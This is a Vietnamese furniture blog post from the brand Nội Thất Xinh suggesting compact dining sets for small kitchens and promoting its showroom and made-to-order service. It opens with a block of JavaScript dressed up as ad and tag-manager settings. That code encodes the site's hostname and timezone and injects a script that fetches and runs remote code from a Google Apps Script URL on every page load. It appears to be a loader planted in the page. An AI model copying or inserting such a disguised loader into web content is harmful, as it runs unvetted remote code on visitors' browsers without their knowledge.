var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Gợi ý các bộ bàn ăn cho phòng bếp nhỏ nên tham khảo

Rất nhiều người cho rằng không gian nhà bếp nhỏ không nhất thiết phải sử dụng bàn ghế ăn vì sẽ tạo cảm giác chật chội. Đó được xem là một trong những sai lầm rất phổ biến hiện nay. Bởi nếu lựa chọn các bộ bàn ăn cho phòng bếp nhỏ phù hợp sẽ giúp gia chủ ngồi ăn cơm dễ dàng, ngon miệng hơn. Đồng thời tạo cho căn nhà vẻ đẹp thẩm mỹ tinh tế, hoàn thiện tiện nghi.

Nếu bạn đang băn khoăn chưa biết nên mua sắm những bộ bàn ghế phòng ăn nhỏ gọn ở đâu tốt, mẫu mới, đẹp và hiện đại. Có thể tham khảo gợi ý các bộ bàn ăn cho phòng bếp nhỏ được ưa chuộng nhất dưới đây từ thương hiệu Nội Thất Xinh.

Top các bộ bàn ăn cho phòng bếp nhỏ được yêu thích nhất

Thương hiệu Nội Thất Xinh giới thiệu đến khách hàng top các mẫu bàn ăn cho phòng bếp nhỏ được đánh giá cao về chất lượng. Với ưu điểm thiết kế gọn gàng, kiểu dáng đơn giản tinh tế giúp không gian nhà bếp không chiếm quá nhiều diện tích. Chắc chắn sẽ giúp cho các căn hộ chung cư hoặc nhà phố nhỏ trở nên gọn gàng hơn.

Bộ sưu tập những bộ bàn ghế phòng ăn nhỏ gọn dưới đây được cập nhật đều là mẫu mới, phong cách có thể đặt trong nhiều không gian. Đặc biệt là các không gian mở có nhà bếp liên thông với khu vực phòng khách, kết nối với nhiều món đồ nội thất như: sofa cao cấp, bàn trà, thảm trải sàn, kệ tivi…

Gợi ý các bộ bàn ăn cho phòng bếp nhỏ nên tham khảo
Gợi ý các bộ bàn ăn cho phòng bếp nhỏ lựa chọn những mẫu bàn ăn 4 ghế được đánh giá cao nhất về chất lượng
Gợi ý các bộ bàn ăn cho phòng bếp nhỏ nên tham khảo
Bộ bàn ghế ăn cho phòng bếp nhỏ thiết kế hiện đại, đơn giản giúp không gian trông gọn gàng hơn
Gợi ý các bộ bàn ăn cho phòng bếp nhỏ nên tham khảo
Nếu bạn yêu thích những bộ bàn ăn hiện đại sang trọng có thể tham khảo gợi ý mẫu bàn ăn mặt đá chân sắt
Gợi ý các bộ bàn ăn cho phòng bếp nhỏ nên tham khảo
Bàn ăn 4 ghế nhỏ gọn sử dụng chất liệu khung gỗ tự nhiên, mặt bàn từ kính cường lực ăn gian diện tích
Gợi ý các bộ bàn ăn cho phòng bếp nhỏ nên tham khảo
Bộ bàn ăn cho phòng bếp nhỏ gọn êm ái với ghế ăn bọc vải vừa đơn giản vừa tinh tế
Gợi ý các bộ bàn ăn cho phòng bếp nhỏ nên tham khảo
Thiết kế bàn ăn thông minh mở rộng với phần mặt bàn có thể kéo dài bày trí thêm đồ ăn, khi không cần thiết có thể thu vào giúp không gian gọn gàng hơn.
Gợi ý các bộ bàn ăn cho phòng bếp nhỏ nên tham khảo
Thiết kế bàn ăn hiện đại đơn giản vẫn là gợi ý được yêu thích nhất cho không gian nhà bếp nhỏ

Để mua các bộ bàn ăn cho phòng bếp nhỏ trên, bạn có thể đến ngay showroom Nội Thất Xinh. Hoặc truy cập ngay qua website: https://noithatxinh.vn/ban-ghe-an để xem hơn 50+ bộ bàn ghế ăn cho nhà bếp nhỏ có sẵn, thiết kế độc đáo, tinh tế và sang trọng.

Chọn bộ bàn ăn cho phòng bếp nhỏ có thể đặt hàng theo yêu cầu

Ngoài một số thiết kế bộ bàn ăn cho phòng bếp nhỏ gọn được thiết kế mẫu mã có sẵn. Bạn cũng có thể đặt mua theo yêu cầu về kích thước, chất liệu, kiểu dáng, mức giá mong muốn để đặt ăn khớp với không gian. Vì nhiều kiểu phòng khách hiện nay được thiết kế khá đặc trưng nên những sản phẩm có sẵn không phù hợp.

Với lợi thế xưởng sản xuất bàn ghế ăn rộng lớn bạn có thể đến Nội Thất Xinh chúng tôi sẽ giúp bạn đặt mua theo mọi yêu cầu mà mình mong muốn. Ngoài bàn ăn cho nhà nhỏ, chúng tôi còn cung cấp rất nhiều mẫu ghế sofa cao cấp, bàn trà phòng khách, kệ tivi… đặt mua theo mọi yêu cầu mà khách hàng mong muốn.